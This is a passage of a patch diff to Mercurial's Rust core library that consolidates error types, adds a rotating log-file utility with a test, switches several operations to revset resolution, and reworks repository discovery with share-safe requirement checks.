+ Common(errors::HgError),
}
-impl From<DirstateParseError> for DirstateError {
- fn from(e: DirstateParseError) -> Self {
- DirstateError::Parse(e)
- }
-}
-
-impl From<DirstatePackError> for DirstateError {
- fn from(e: DirstatePackError) -> Self {
- DirstateError::Pack(e)
- }
-}
-
-#[derive(Debug)]
+#[derive(Debug, derive_more::From)]
pub enum PatternError {
+ #[from]
Path(HgPathError),
UnsupportedSyntax(String),
UnsupportedSyntaxInFile(String, String, usize),
TooLong(usize),
+ #[from]
IO(std::io::Error),
/// Needed a pattern that can be turned into a regex but got one that
/// can't. This should only happen through programmer error.
NonRegexPattern(IgnorePattern),
}
-impl ToString for PatternError {
- fn to_string(&self) -> String {
+impl fmt::Display for PatternError {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
PatternError::UnsupportedSyntax(syntax) => {
- format!("Unsupported syntax {}", syntax)
+ write!(f, "Unsupported syntax {}", syntax)
}
PatternError::UnsupportedSyntaxInFile(syntax, file_path, line) => {
- format!(
+ write!(
+ f,
"{}:{}: unsupported syntax {}",
file_path, line, syntax
)
}
PatternError::TooLong(size) => {
- format!("matcher pattern is too long ({} bytes)", size)
+ write!(f, "matcher pattern is too long ({} bytes)", size)
}
- PatternError::IO(e) => e.to_string(),
- PatternError::Path(e) => e.to_string(),
+ PatternError::IO(error) => error.fmt(f),
+ PatternError::Path(error) => error.fmt(f),
PatternError::NonRegexPattern(pattern) => {
- format!("'{:?}' cannot be turned into a regex", pattern)
+ write!(f, "'{:?}' cannot be turned into a regex", pattern)
}
}
}
}
-
-impl From<DirstateMapError> for DirstateError {
- fn from(e: DirstateMapError) -> Self {
- DirstateError::Map(e)
- }
-}
-
-impl From<std::io::Error> for DirstateError {
- fn from(e: std::io::Error) -> Self {
- DirstateError::IO(e)
- }
-}
-
-impl From<std::io::Error> for PatternError {
- fn from(e: std::io::Error) -> Self {
- PatternError::IO(e)
- }
-}
-
-impl From<HgPathError> for PatternError {
- fn from(e: HgPathError) -> Self {
- PatternError::Path(e)
- }
-}
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/rust/hg-core/src/logging.rs Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,101 @@
+use crate::errors::{HgError, HgResultExt, IoErrorContext, IoResultExt};
+use crate::repo::Vfs;
+use std::io::Write;
+
+/// An utility to append to a log file with the given name, and optionally
+/// rotate it after it reaches a certain maximum size.
+///
+/// Rotation works by renaming "example.log" to "example.log.1", after renaming
+/// "example.log.1" to "example.log.2" etc up to the given maximum number of
+/// files.
+pub struct LogFile<'a> {
+ vfs: Vfs<'a>,
+ name: &'a str,
+ max_size: Option<u64>,
+ max_files: u32,
+}
+
+impl<'a> LogFile<'a> {
+ pub fn new(vfs: Vfs<'a>, name: &'a str) -> Self {
+ Self {
+ vfs,
+ name,
+ max_size: None,
+ max_files: 0,
+ }
+ }
+
+ /// Rotate before writing to a log file that was already larger than the
+ /// given size, in bytes. `None` disables rotation.
+ pub fn max_size(mut self, value: Option<u64>) -> Self {
+ self.max_size = value;
+ self
+ }
+
+ /// Keep this many rotated files `{name}.1` up to `{name}.{max}`, in
+ /// addition to the original `{name}` file.
+ pub fn max_files(mut self, value: u32) -> Self {
+ self.max_files = value;
+ self
+ }
+
+ /// Append the given `bytes` as-is to the log file, after rotating if
+ /// needed.
+ ///
+ /// No trailing newline is added. Make sure to include one in `bytes` if
+ /// desired.
+ pub fn write(&self, bytes: &[u8]) -> Result<(), HgError> {
+ let path = self.vfs.join(self.name);
+ let context = || IoErrorContext::WritingFile(path.clone());
+ let open = || {
+ std::fs::OpenOptions::new()
+ .create(true)
+ .append(true)
+ .open(&path)
+ .with_context(context)
+ };
+ let mut file = open()?;
+ if let Some(max_size) = self.max_size {
+ if file.metadata().with_context(context)?.len() >= max_size {
+ // For example with `max_files == 5`, the first iteration of
+ // this loop has `i == 4` and renames `{name}.4` to `{name}.5`.
+ // The last iteration renames `{name}.1` to
+ // `{name}.2`
+ for i in (1..self.max_files).rev() {
+ self.vfs
+ .rename(
+ format!("{}.{}", self.name, i),
+ format!("{}.{}", self.name, i + 1),
+ )
+ .io_not_found_as_none()?;
+ }
+ // Then rename `{name}` to `{name}.1`. This is the
+ // previously-opened `file`.
+ self.vfs
+ .rename(self.name, format!("{}.1", self.name))
+ .io_not_found_as_none()?;
+ // Finally, create a new `{name}` file and replace our `file`
+ // handle.
+ file = open()?;
+ }
+ }
+ file.write_all(bytes).with_context(context)?;
+ file.sync_all().with_context(context)
+ }
+}
+
+#[test]
+fn test_rotation() {
+ let temp = tempfile::tempdir().unwrap();
+ let vfs = Vfs { base: temp.path() };
+ let logger = LogFile::new(vfs, "log").max_size(Some(3)).max_files(2);
+ logger.write(b"one\n").unwrap();
+ logger.write(b"two\n").unwrap();
+ logger.write(b"3\n").unwrap();
+ logger.write(b"four\n").unwrap();
+ logger.write(b"five\n").unwrap();
+ assert_eq!(vfs.read("log").unwrap(), b"five\n");
+ assert_eq!(vfs.read("log.1").unwrap(), b"3\nfour\n");
+ assert_eq!(vfs.read("log.2").unwrap(), b"two\n");
+ assert!(vfs.read("log.3").io_not_found_as_none().unwrap().is_none());
+}
--- a/rust/hg-core/src/operations/cat.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/operations/cat.rs Tue Apr 20 11:01:06 2021 -0400
@@ -5,7 +5,6 @@
// This software may be used and distributed according to the terms of the
// GNU General Public License version 2 or any later version.
-use std::convert::From;
use std::path::PathBuf;
use crate::repo::Repo;
@@ -15,99 +14,59 @@
use crate::revlog::revlog::Revlog;
use crate::revlog::revlog::RevlogError;
use crate::revlog::Node;
-use crate::revlog::NodePrefix;
-use crate::revlog::Revision;
use crate::utils::files::get_path_from_bytes;
use crate::utils::hg_path::{HgPath, HgPathBuf};
+pub struct CatOutput {
+ /// Whether any file in the manifest matched the paths given as CLI
+ /// arguments
+ pub found_any: bool,
+ /// The contents of matching files, in manifest order
+ pub concatenated: Vec<u8>,
+ /// Which of the CLI arguments did not match any manifest file
+ pub missing: Vec<HgPathBuf>,
+ /// The node ID that the given revset was resolved to
+ pub node: Node,
+}
+
const METADATA_DELIMITER: [u8; 2] = [b'\x01', b'\n'];
-/// Kind of error encountered by `CatRev`
-#[derive(Debug)]
-pub enum CatRevErrorKind {
- /// Error when reading a `revlog` file.
- IoError(std::io::Error),
- /// The revision has not been found.
- InvalidRevision,
- /// Found more than one revision whose ID match the requested prefix
- AmbiguousPrefix,
- /// A `revlog` file is corrupted.
- CorruptedRevlog,
- /// The `revlog` format version is not supported.
- UnsuportedRevlogVersion(u16),
- /// The `revlog` data format is not supported.
- UnknowRevlogDataFormat(u8),
-}
-
-/// A `CatRev` error
-#[derive(Debug)]
-pub struct CatRevError {
- /// Kind of error encountered by `CatRev`
- pub kind: CatRevErrorKind,
-}
-
-impl From<CatRevErrorKind> for CatRevError {
- fn from(kind: CatRevErrorKind) -> Self {
- CatRevError { kind }
- }
-}
-
-impl From<RevlogError> for CatRevError {
- fn from(err: RevlogError) -> Self {
- match err {
- RevlogError::IoError(err) => CatRevErrorKind::IoError(err),
- RevlogError::UnsuportedVersion(version) => {
- CatRevErrorKind::UnsuportedRevlogVersion(version)
- }
- RevlogError::InvalidRevision => CatRevErrorKind::InvalidRevision,
- RevlogError::AmbiguousPrefix => CatRevErrorKind::AmbiguousPrefix,
- RevlogError::Corrupted => CatRevErrorKind::CorruptedRevlog,
- RevlogError::UnknowDataFormat(format) => {
- CatRevErrorKind::UnknowRevlogDataFormat(format)
- }
- }
- .into()
- }
-}
-
-/// List files under Mercurial control at a given revision.
+/// Output the given revision of files
///
/// * `root`: Repository root
/// * `rev`: The revision to cat the files from.
/// * `files`: The files to output.
-pub fn cat(
+pub fn cat<'a>(
repo: &Repo,
- rev: &str,
- files: &[HgPathBuf],
-) -> Result<Vec<u8>, CatRevError> {
+ revset: &str,
+ files: &'a [HgPathBuf],
+) -> Result<CatOutput, RevlogError> {
+ let rev = crate::revset::resolve_single(revset, repo)?;
let changelog = Changelog::open(repo)?;
let manifest = Manifest::open(repo)?;
-
- let changelog_entry = match rev.parse::<Revision>() {
- Ok(rev) => changelog.get_rev(rev)?,
- _ => {
- let changelog_node = NodePrefix::from_hex(&rev)
- .map_err(|_| CatRevErrorKind::InvalidRevision)?;
- changelog.get_node(changelog_node.borrow())?
- }
- };
- let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?)
- .map_err(|_| CatRevErrorKind::CorruptedRevlog)?;
-
- let manifest_entry = manifest.get_node((&manifest_node).into())?;
+ let changelog_entry = changelog.get_rev(rev)?;
+ let node = *changelog
+ .node_from_rev(rev)
+ .expect("should succeed when changelog.get_rev did");
+ let manifest_node =
+ Node::from_hex_for_repo(&changelog_entry.manifest_node()?)?;
+ let manifest_entry = manifest.get_node(manifest_node.into())?;
let mut bytes = vec![];
+ let mut matched = vec![false; files.len()];
+ let mut found_any = false;
for (manifest_file, node_bytes) in manifest_entry.files_with_nodes() {
- for cat_file in files.iter() {
+ for (cat_file, is_matched) in files.iter().zip(&mut matched) {
if cat_file.as_bytes() == manifest_file.as_bytes() {
+ *is_matched = true;
+ found_any = true;
let index_path = store_path(manifest_file, b".i");
let data_path = store_path(manifest_file, b".d");
let file_log =
Revlog::open(repo, &index_path, Some(&data_path))?;
- let file_node = Node::from_hex(node_bytes)
- .map_err(|_| CatRevErrorKind::CorruptedRevlog)?;
- let file_rev = file_log.get_node_rev((&file_node).into())?;
+ let file_node = Node::from_hex_for_repo(node_bytes)?;
+ let file_rev = file_log.get_node_rev(file_node.into())?;
let data = file_log.get_rev_data(file_rev)?;
if data.starts_with(&METADATA_DELIMITER) {
let end_delimiter_position = data
@@ -125,7 +84,18 @@
}
}
- Ok(bytes)
+ let missing: Vec<_> = files
+ .iter()
+ .zip(&matched)
+ .filter(|pair| !*pair.1)
+ .map(|pair| pair.0.clone())
+ .collect();
+ Ok(CatOutput {
+ found_any,
+ concatenated: bytes,
+ missing,
+ node,
+ })
}
fn store_path(hg_path: &HgPath, suffix: &[u8]) -> PathBuf {
--- a/rust/hg-core/src/operations/debugdata.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/operations/debugdata.rs Tue Apr 20 11:01:06 2021 -0400
@@ -7,8 +7,6 @@
use crate::repo::Repo;
use crate::revlog::revlog::{Revlog, RevlogError};
-use crate::revlog::NodePrefix;
-use crate::revlog::Revision;
/// Kind of data to debug
#[derive(Debug, Copy, Clone)]
@@ -17,86 +15,19 @@
Manifest,
}
-/// Kind of error encountered by DebugData
-#[derive(Debug)]
-pub enum DebugDataErrorKind {
- /// Error when reading a `revlog` file.
- IoError(std::io::Error),
- /// The revision has not been found.
- InvalidRevision,
- /// Found more than one revision whose ID match the requested prefix
- AmbiguousPrefix,
- /// A `revlog` file is corrupted.
- CorruptedRevlog,
- /// The `revlog` format version is not supported.
- UnsuportedRevlogVersion(u16),
- /// The `revlog` data format is not supported.
- UnknowRevlogDataFormat(u8),
-}
-
-/// A DebugData error
-#[derive(Debug)]
-pub struct DebugDataError {
- /// Kind of error encountered by DebugData
- pub kind: DebugDataErrorKind,
-}
-
-impl From<DebugDataErrorKind> for DebugDataError {
- fn from(kind: DebugDataErrorKind) -> Self {
- DebugDataError { kind }
- }
-}
-
-impl From<std::io::Error> for DebugDataError {
- fn from(err: std::io::Error) -> Self {
- let kind = DebugDataErrorKind::IoError(err);
- DebugDataError { kind }
- }
-}
-
-impl From<RevlogError> for DebugDataError {
- fn from(err: RevlogError) -> Self {
- match err {
- RevlogError::IoError(err) => DebugDataErrorKind::IoError(err),
- RevlogError::UnsuportedVersion(version) => {
- DebugDataErrorKind::UnsuportedRevlogVersion(version)
- }
- RevlogError::InvalidRevision => {
- DebugDataErrorKind::InvalidRevision
- }
- RevlogError::AmbiguousPrefix => {
- DebugDataErrorKind::AmbiguousPrefix
- }
- RevlogError::Corrupted => DebugDataErrorKind::CorruptedRevlog,
- RevlogError::UnknowDataFormat(format) => {
- DebugDataErrorKind::UnknowRevlogDataFormat(format)
- }
- }
- .into()
- }
-}
-
/// Dump the contents data of a revision.
pub fn debug_data(
repo: &Repo,
- rev: &str,
+ revset: &str,
kind: DebugDataKind,
-) -> Result<Vec<u8>, DebugDataError> {
+) -> Result<Vec<u8>, RevlogError> {
let index_file = match kind {
DebugDataKind::Changelog => "00changelog.i",
DebugDataKind::Manifest => "00manifest.i",
};
let revlog = Revlog::open(repo, index_file, None)?;
-
- let data = match rev.parse::<Revision>() {
- Ok(rev) => revlog.get_rev_data(rev)?,
- _ => {
- let node = NodePrefix::from_hex(&rev)
- .map_err(|_| DebugDataErrorKind::InvalidRevision)?;
- let rev = revlog.get_node_rev(node.borrow())?;
- revlog.get_rev_data(rev)?
- }
- };
-
+ let rev =
+ crate::revset::resolve_rev_number_or_hex_prefix(revset, &revlog)?;
+ let data = revlog.get_rev_data(rev)?;
Ok(data)
}
--- a/rust/hg-core/src/operations/dirstate_status.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/operations/dirstate_status.rs Tue Apr 20 11:01:06 2021 -0400
@@ -14,66 +14,6 @@
/// files.
pub type LookupAndStatus<'a> = (Vec<HgPathCow<'a>>, DirstateStatus<'a>);
-#[cfg(feature = "dirstate-tree")]
-impl<'a, M: Matcher + Sync> Status<'a, M> {
- pub(crate) fn run(&self) -> Result<LookupAndStatus<'a>, StatusError> {
- let (traversed_sender, traversed_receiver) =
- crossbeam_channel::unbounded();
-
- // Step 1: check the files explicitly mentioned by the user
- let (work, mut results) = self.walk_explicit(traversed_sender.clone());
-
- // Step 2: Check files in the dirstate
- if !self.matcher.is_exact() {
- self.extend_from_dmap(&mut results);
- }
- // Step 3: Check the working directory if listing unknowns
- if !work.is_empty() {
- // Hashmaps are quite a bit slower to build than vecs, so only
- // build it if needed.
- let mut old_results = None;
-
- // Step 2: recursively check the working directory for changes if
- // needed
- for (dir, dispatch) in work {
- match dispatch {
- Dispatch::Directory { was_file } => {
- if was_file {
- results.push((dir.to_owned(), Dispatch::Removed));
- }
- if self.options.list_ignored
- || self.options.list_unknown
- && !self.dir_ignore(&dir)
- {
- if old_results.is_none() {
- old_results =
- Some(results.iter().cloned().collect());
- }
- self.traverse(
- &dir,
- old_results
- .as_ref()
- .expect("old results should exist"),
- &mut results,
- traversed_sender.clone(),
- );
- }
- }
- _ => {
- unreachable!("There can only be directories in `work`")
- }
- }
- }
- }
-
- drop(traversed_sender);
- let traversed = traversed_receiver.into_iter().collect();
-
- Ok(build_response(results, traversed))
- }
-}
-
-#[cfg(not(feature = "dirstate-tree"))]
impl<'a, M: Matcher + Sync> Status<'a, M> {
pub(crate) fn run(&self) -> Result<LookupAndStatus<'a>, StatusError> {
let (traversed_sender, traversed_receiver) =
--- a/rust/hg-core/src/operations/find_root.rs Thu Mar 25 19:06:28 2021 -0400
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,100 +0,0 @@
-use std::fmt;
-use std::path::{Path, PathBuf};
-
-/// Kind of error encoutered by FindRoot
-#[derive(Debug)]
-pub enum FindRootErrorKind {
- /// Root of the repository has not been found
- /// Contains the current directory used by FindRoot
- RootNotFound(PathBuf),
- /// The current directory does not exists or permissions are insufficient
- /// to get access to it
- GetCurrentDirError(std::io::Error),
-}
-
-/// A FindRoot error
-#[derive(Debug)]
-pub struct FindRootError {
- /// Kind of error encoutered by FindRoot
- pub kind: FindRootErrorKind,
-}
-
-impl std::error::Error for FindRootError {}
-
-impl fmt::Display for FindRootError {
- fn fmt(&self, _f: &mut fmt::Formatter<'_>) -> fmt::Result {
- unimplemented!()
- }
-}
-
-/// Find the root of the repository
-/// by searching for a .hg directory in the process’ current directory and its
-/// ancestors
-pub fn find_root() -> Result<PathBuf, FindRootError> {
- let current_dir = std::env::current_dir().map_err(|e| FindRootError {
- kind: FindRootErrorKind::GetCurrentDirError(e),
- })?;
- Ok(find_root_from_path(¤t_dir)?.into())
-}
-
-/// Find the root of the repository
-/// by searching for a .hg directory in the given directory and its ancestors
-pub fn find_root_from_path(start: &Path) -> Result<&Path, FindRootError> {
- if start.join(".hg").exists() {
- return Ok(start);
- }
- for ancestor in start.ancestors() {
- if ancestor.join(".hg").exists() {
- return Ok(ancestor);
- }
- }
- Err(FindRootError {
- kind: FindRootErrorKind::RootNotFound(start.into()),
- })
-}
-
-#[cfg(test)]
-mod tests {
- use super::*;
- use std::fs;
- use tempfile;
-
- #[test]
- fn dot_hg_not_found() {
- let tmp_dir = tempfile::tempdir().unwrap();
- let path = tmp_dir.path();
-
- let err = find_root_from_path(&path).unwrap_err();
-
- // TODO do something better
- assert!(match err {
- FindRootError { kind } => match kind {
- FindRootErrorKind::RootNotFound(p) => p == path.to_path_buf(),
- _ => false,
- },
- })
- }
-
- #[test]
- fn dot_hg_in_current_path() {
- let tmp_dir = tempfile::tempdir().unwrap();
- let root = tmp_dir.path();
- fs::create_dir_all(root.join(".hg")).unwrap();
-
- let result = find_root_from_path(&root).unwrap();
-
- assert_eq!(result, root)
- }
-
- #[test]
- fn dot_hg_in_parent() {
- let tmp_dir = tempfile::tempdir().unwrap();
- let root = tmp_dir.path();
- fs::create_dir_all(root.join(".hg")).unwrap();
-
- let directory = root.join("some/nested/directory");
- let result = find_root_from_path(&directory).unwrap();
-
- assert_eq!(result, root)
- }
-} /* tests */
--- a/rust/hg-core/src/operations/list_tracked_files.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/operations/list_tracked_files.rs Tue Apr 20 11:01:06 2021 -0400
@@ -6,47 +6,15 @@
// GNU General Public License version 2 or any later version.
use crate::dirstate::parsers::parse_dirstate;
+use crate::errors::HgError;
use crate::repo::Repo;
use crate::revlog::changelog::Changelog;
use crate::revlog::manifest::{Manifest, ManifestEntry};
-use crate::revlog::node::{Node, NodePrefix};
+use crate::revlog::node::Node;
use crate::revlog::revlog::RevlogError;
-use crate::revlog::Revision;
use crate::utils::hg_path::HgPath;
-use crate::{DirstateParseError, EntryState};
+use crate::EntryState;
use rayon::prelude::*;
-use std::convert::From;
-
-/// Kind of error encountered by `ListDirstateTrackedFiles`
-#[derive(Debug)]
-pub enum ListDirstateTrackedFilesErrorKind {
- /// Error when reading the `dirstate` file
- IoError(std::io::Error),
- /// Error when parsing the `dirstate` file
- ParseError(DirstateParseError),
-}
-
-/// A `ListDirstateTrackedFiles` error
-#[derive(Debug)]
-pub struct ListDirstateTrackedFilesError {
- /// Kind of error encountered by `ListDirstateTrackedFiles`
- pub kind: ListDirstateTrackedFilesErrorKind,
-}
-
-impl From<ListDirstateTrackedFilesErrorKind>
- for ListDirstateTrackedFilesError
-{
- fn from(kind: ListDirstateTrackedFilesErrorKind) -> Self {
- ListDirstateTrackedFilesError { kind }
- }
-}
-
-impl From<std::io::Error> for ListDirstateTrackedFilesError {
- fn from(err: std::io::Error) -> Self {
- let kind = ListDirstateTrackedFilesErrorKind::IoError(err);
- ListDirstateTrackedFilesError { kind }
- }
-}
/// List files under Mercurial control in the working directory
/// by reading the dirstate
@@ -56,16 +24,13 @@
}
impl Dirstate {
- pub fn new(repo: &Repo) -> Result<Self, ListDirstateTrackedFilesError> {
+ pub fn new(repo: &Repo) -> Result<Self, HgError> {
let content = repo.hg_vfs().read("dirstate")?;
Ok(Self { content })
}
- pub fn tracked_files(
- &self,
- ) -> Result<Vec<&HgPath>, ListDirstateTrackedFilesError> {
- let (_, entries, _) = parse_dirstate(&self.content)
- .map_err(ListDirstateTrackedFilesErrorKind::ParseError)?;
+ pub fn tracked_files(&self) -> Result<Vec<&HgPath>, HgError> {
+ let (_, entries, _) = parse_dirstate(&self.content)?;
let mut files: Vec<&HgPath> = entries
.into_iter()
.filter_map(|(path, entry)| match entry.state {
@@ -78,81 +43,18 @@
}
}
-/// Kind of error encountered by `ListRevTrackedFiles`
-#[derive(Debug)]
-pub enum ListRevTrackedFilesErrorKind {
- /// Error when reading a `revlog` file.
- IoError(std::io::Error),
- /// The revision has not been found.
- InvalidRevision,
- /// Found more than one revision whose ID match the requested prefix
- AmbiguousPrefix,
- /// A `revlog` file is corrupted.
- CorruptedRevlog,
- /// The `revlog` format version is not supported.
- UnsuportedRevlogVersion(u16),
- /// The `revlog` data format is not supported.
- UnknowRevlogDataFormat(u8),
-}
-
-/// A `ListRevTrackedFiles` error
-#[derive(Debug)]
-pub struct ListRevTrackedFilesError {
- /// Kind of error encountered by `ListRevTrackedFiles`
- pub kind: ListRevTrackedFilesErrorKind,
-}
-
-impl From<ListRevTrackedFilesErrorKind> for ListRevTrackedFilesError {
- fn from(kind: ListRevTrackedFilesErrorKind) -> Self {
- ListRevTrackedFilesError { kind }
- }
-}
-
-impl From<RevlogError> for ListRevTrackedFilesError {
- fn from(err: RevlogError) -> Self {
- match err {
- RevlogError::IoError(err) => {
- ListRevTrackedFilesErrorKind::IoError(err)
- }
- RevlogError::UnsuportedVersion(version) => {
- ListRevTrackedFilesErrorKind::UnsuportedRevlogVersion(version)
- }
- RevlogError::InvalidRevision => {
- ListRevTrackedFilesErrorKind::InvalidRevision
- }
- RevlogError::AmbiguousPrefix => {
- ListRevTrackedFilesErrorKind::AmbiguousPrefix
- }
- RevlogError::Corrupted => {
- ListRevTrackedFilesErrorKind::CorruptedRevlog
- }
- RevlogError::UnknowDataFormat(format) => {
- ListRevTrackedFilesErrorKind::UnknowRevlogDataFormat(format)
- }
- }
- .into()
- }
-}
-
/// List files under Mercurial control at a given revision.
pub fn list_rev_tracked_files(
repo: &Repo,
- rev: &str,
-) -> Result<FilesForRev, ListRevTrackedFilesError> {
+ revset: &str,
+) -> Result<FilesForRev, RevlogError> {
+ let rev = crate::revset::resolve_single(revset, repo)?;
let changelog = Changelog::open(repo)?;
let manifest = Manifest::open(repo)?;
-
- let changelog_entry = match rev.parse::<Revision>() {
- Ok(rev) => changelog.get_rev(rev)?,
- _ => {
- let changelog_node = NodePrefix::from_hex(&rev)
- .or(Err(ListRevTrackedFilesErrorKind::InvalidRevision))?;
- changelog.get_node(changelog_node.borrow())?
- }
- };
- let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?)
- .or(Err(ListRevTrackedFilesErrorKind::CorruptedRevlog))?;
- let manifest_entry = manifest.get_node((&manifest_node).into())?;
+ let changelog_entry = changelog.get_rev(rev)?;
+ let manifest_node =
+ Node::from_hex_for_repo(&changelog_entry.manifest_node()?)?;
+ let manifest_entry = manifest.get_node(manifest_node.into())?;
Ok(FilesForRev(manifest_entry))
}
--- a/rust/hg-core/src/operations/mod.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/operations/mod.rs Tue Apr 20 11:01:06 2021 -0400
@@ -5,19 +5,8 @@
mod cat;
mod debugdata;
mod dirstate_status;
-mod find_root;
mod list_tracked_files;
-pub use cat::{cat, CatRevError, CatRevErrorKind};
-pub use debugdata::{
- debug_data, DebugDataError, DebugDataErrorKind, DebugDataKind,
-};
-pub use find_root::{
- find_root, find_root_from_path, FindRootError, FindRootErrorKind,
-};
-pub use list_tracked_files::{
- list_rev_tracked_files, FilesForRev, ListRevTrackedFilesError,
- ListRevTrackedFilesErrorKind,
-};
-pub use list_tracked_files::{
- Dirstate, ListDirstateTrackedFilesError, ListDirstateTrackedFilesErrorKind,
-};
+pub use cat::{cat, CatOutput};
+pub use debugdata::{debug_data, DebugDataKind};
+pub use list_tracked_files::Dirstate;
+pub use list_tracked_files::{list_rev_tracked_files, FilesForRev};
--- a/rust/hg-core/src/repo.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/repo.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,10 @@
-use crate::operations::{find_root, FindRootError};
+use crate::config::{Config, ConfigError, ConfigParseError};
+use crate::errors::{HgError, IoErrorContext, IoResultExt};
use crate::requirements;
+use crate::utils::files::get_path_from_bytes;
+use crate::utils::SliceExt;
use memmap::{Mmap, MmapOptions};
+use std::collections::HashSet;
use std::path::{Path, PathBuf};
/// A repository on disk
@@ -8,85 +12,255 @@
working_directory: PathBuf,
dot_hg: PathBuf,
store: PathBuf,
+ requirements: HashSet<String>,
+ config: Config,
+}
+
+#[derive(Debug, derive_more::From)]
+pub enum RepoError {
+ NotFound {
+ at: PathBuf,
+ },
+ #[from]
+ ConfigParseError(ConfigParseError),
+ #[from]
+ Other(HgError),
+}
+
+impl From<ConfigError> for RepoError {
+ fn from(error: ConfigError) -> Self {
+ match error {
+ ConfigError::Parse(error) => error.into(),
+ ConfigError::Other(error) => error.into(),
+ }
+ }
}
/// Filesystem access abstraction for the contents of a given "base" diretory
#[derive(Clone, Copy)]
-pub(crate) struct Vfs<'a> {
- base: &'a Path,
+pub struct Vfs<'a> {
+ pub(crate) base: &'a Path,
}
impl Repo {
- /// Returns `None` if the given path doesn’t look like a repository
- /// (doesn’t contain a `.hg` sub-directory).
- pub fn for_path(root: impl Into<PathBuf>) -> Self {
- let working_directory = root.into();
- let dot_hg = working_directory.join(".hg");
- Self {
- store: dot_hg.join("store"),
- dot_hg,
- working_directory,
+ /// Find a repository, either at the given path (which must contain a `.hg`
+ /// sub-directory) or by searching the current directory and its
+ /// ancestors.
+ ///
+ /// A method with two very different "modes" like this usually a code smell
+ /// to make two methods instead, but in this case an `Option` is what rhg
+ /// sub-commands get from Clap for the `-R` / `--repository` CLI argument.
+ /// Having two methods would just move that `if` to almost all callers.
+ pub fn find(
+ config: &Config,
+ explicit_path: Option<&Path>,
+ ) -> Result<Self, RepoError> {
+ if let Some(root) = explicit_path {
+ if root.join(".hg").is_dir() {
+ Self::new_at_path(root.to_owned(), config)
+ } else if root.is_file() {
+ Err(HgError::unsupported("bundle repository").into())
+ } else {
+ Err(RepoError::NotFound {
+ at: root.to_owned(),
+ })
+ }
+ } else {
+ let current_directory = crate::utils::current_dir()?;
+ // ancestors() is inclusive: it first yields `current_directory`
+ // as-is.
+ for ancestor in current_directory.ancestors() {
+ if ancestor.join(".hg").is_dir() {
+ return Self::new_at_path(ancestor.to_owned(), config);
+ }
+ }
+ Err(RepoError::NotFound {
+ at: current_directory,
+ })
}
}
- pub fn find() -> Result<Self, FindRootError> {
- find_root().map(Self::for_path)
- }
+ /// To be called after checking that `.hg` is a sub-directory
+ fn new_at_path(
+ working_directory: PathBuf,
+ config: &Config,
+ ) -> Result<Self, RepoError> {
+ let dot_hg = working_directory.join(".hg");
+
+ let mut repo_config_files = Vec::new();
+ repo_config_files.push(dot_hg.join("hgrc"));
+ repo_config_files.push(dot_hg.join("hgrc-not-shared"));
+
+ let hg_vfs = Vfs { base: &dot_hg };
+ let mut reqs = requirements::load_if_exists(hg_vfs)?;
+ let relative =
+ reqs.contains(requirements::RELATIVE_SHARED_REQUIREMENT);
+ let shared =
+ reqs.contains(requirements::SHARED_REQUIREMENT) || relative;
+
+ // From `mercurial/localrepo.py`:
+ //
+ // if .hg/requires contains the sharesafe requirement, it means
+ // there exists a `.hg/store/requires` too and we should read it
+ // NOTE: presence of SHARESAFE_REQUIREMENT imply that store requirement
+ // is present. We never write SHARESAFE_REQUIREMENT for a repo if store
+ // is not present, refer checkrequirementscompat() for that
+ //
+ // However, if SHARESAFE_REQUIREMENT is not present, it means that the
+ // repository was shared the old way. We check the share source
+ // .hg/requires for SHARESAFE_REQUIREMENT to detect whether the
+ // current repository needs to be reshared
+ let share_safe = reqs.contains(requirements::SHARESAFE_REQUIREMENT);
+
+ let store_path;
+ if !shared {
+ store_path = dot_hg.join("store");
+ } else {
+ let bytes = hg_vfs.read("sharedpath")?;
+ let mut shared_path =
+ get_path_from_bytes(bytes.trim_end_newlines()).to_owned();
+ if relative {
+ shared_path = dot_hg.join(shared_path)
+ }
+ if !shared_path.is_dir() {
+ return Err(HgError::corrupted(format!(
+ ".hg/sharedpath points to nonexistent directory {}",
+ shared_path.display()
+ ))
+ .into());
+ }
+
+ store_path = shared_path.join("store");
- pub fn check_requirements(
- &self,
- ) -> Result<(), requirements::RequirementsError> {
- requirements::check(self)
+ let source_is_share_safe =
+ requirements::load(Vfs { base: &shared_path })?
+ .contains(requirements::SHARESAFE_REQUIREMENT);
+
+ if share_safe && !source_is_share_safe {
+ return Err(match config
+ .get(b"share", b"safe-mismatch.source-not-safe")
+ {
+ Some(b"abort") | None => HgError::abort(
+ "abort: share source does not support share-safe requirement\n\
+ (see `hg help config.format.use-share-safe` for more information)",
+ ),
+ _ => HgError::unsupported("share-safe downgrade"),
+ }
+ .into());
+ } else if source_is_share_safe && !share_safe {
+ return Err(
+ match config.get(b"share", b"safe-mismatch.source-safe") {
+ Some(b"abort") | None => HgError::abort(
+ "abort: version mismatch: source uses share-safe \
+ functionality while the current share does not\n\
+ (see `hg help config.format.use-share-safe` for more information)",
+ ),
+ _ => HgError::unsupported("share-safe upgrade"),
+ }
+ .into(),
+ );
+ }
+
+ if share_safe {
+ repo_config_files.insert(0, shared_path.join("hgrc"))
+ }
+ }
+ if share_safe {
+ reqs.extend(requirements::load(Vfs { base: &store_path })?);
+ }
+
+ let repo_config = if std::env::var_os("HGRCSKIPREPO").is_none() {
+ config.combine_with_repo(&repo_config_files)?
+ } else {
+ config.clone()
+ };
+
+ let repo = Self {
+ requirements: reqs,
+ working_directory,
+ store: store_path,
+ dot_hg,
+ config: repo_config,
+ };
+
+ requirements::check(&repo)?;
+
+ Ok(repo)
}
pub fn working_directory_path(&self) -> &Path {
&self.working_directory
}
+ pub fn requirements(&self) -> &HashSet<String> {
+ &self.requirements
+ }
+
+ pub fn config(&self) -> &Config {
+ &self.config
+ }
+
/// For accessing repository files (in `.hg`), except for the store
/// (`.hg/store`).
- pub(crate) fn hg_vfs(&self) -> Vfs<'_> {
